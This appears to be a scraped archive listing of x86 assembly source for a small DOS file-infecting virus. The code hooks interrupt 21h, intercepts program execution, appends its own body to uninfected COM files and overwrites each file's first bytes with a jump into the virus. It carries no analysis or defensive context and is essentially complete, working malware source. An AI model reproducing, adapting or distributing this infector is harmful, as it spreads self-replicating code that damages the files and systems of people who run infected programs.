home *** CD-ROM | disk | FTP | other *** search
- VSize=085h
-
-
-
- Code Segment
-
- Assume CS:Code
-
- org 0
-
- db 4Dh
-
- jmp Start
-
-
-
- Org 600h
-
-
-
- Bytes db 0CDh,20h,90h,90h
-
-
-
- Start: mov si, 0100h
-
- mov bx, offset Int21
-
- mov cx, 0050h
-
- mov di, si
-
- add si, [si+2]
-
- push di
-
- movsw
-
- movsw
-
- mov es, cx
-
- cmpsb
-
- je StartFile
-
- dec si
-
- dec di
-
- rep movsw
-
- mov es, cx
-
- xchg ax, bx
-
- xchg ax, cx
-
- Loop0: xchg ax, cx
-
- xchg ax, word ptr es:[di-120h]
-
- stosw
-
- jcxz Loop0
-
- xchg ax, bx
-
- StartFile:
-
- push ds
-
- pop es
-
- ret
-
-
-
- Int21: cmp ax, 4B00h
-
- jne End21
-
- Exec: push ax
-
- push bx
-
- push dx
-
- push ds
-
- push es
-
- mov ax, 3D02h
-
- call DoInt21
-
- jc EndExec
-
- cbw ;Zero AH
-
- cwd ;Zero DX
-
- mov bx, si ;Move handle to BX
-
- mov ds, ax ;Set DS and ES to 60h,
-
- mov es, ax ;the virus data segment
-
- mov ah, 3Fh ;Read first 4 bytes
-
- int 69h
-
- mov al, 4Dh
-
- scasb ;Check for 4D5Ah or infected file mark
-
- je Close ;.EXE or already infected
-
- mov al, 2
-
- call LSeek ;Seek to the end, SI now contains file size
-
- mov cl, VSize ;Virus size in CX, prepare to write
-
- int 69h ;AH is 40h, i.e. Write operation
-
- mov ax, 0E94Dh ;Virus header in AX
-
- stosw ;Store it
-
- xchg ax, si ;Move file size in AX
-
- stosw ;Complete JMP instruction
-
- xchg ax, dx ;Zero AX
-
- call LSeek ;Seek to the beginning
-
- int 69h ;AH is 40h, write the virus header
-
- Close: mov ah,3Eh ;Close the file
-
- int 69h
-
- EndExec: pop es
-
- pop ds
-
- pop dx
-
- pop bx
-
- pop ax
-
- End21: jmp dword ptr cs:[69h * 4]
-
-
-
- LSeek: mov ah, 42h ;Seek operation
-
- cwd ;Zero DX
-
- DoInt21: xor cx, cx ;External entry for Open, zero cx
-
- int 69h
-
- mov cl, 4 ;4 bytes will be read/written
-
- xchg ax, si ;Store AX in SI
-
- mov ax, 4060h ;Prepare AH for Write
-
- xor di, di ;Zero DI
-
- ret
-
-
-
- VLen = $ - offset Bytes
-
-
-
- Code EndS
-
- End
-
- �
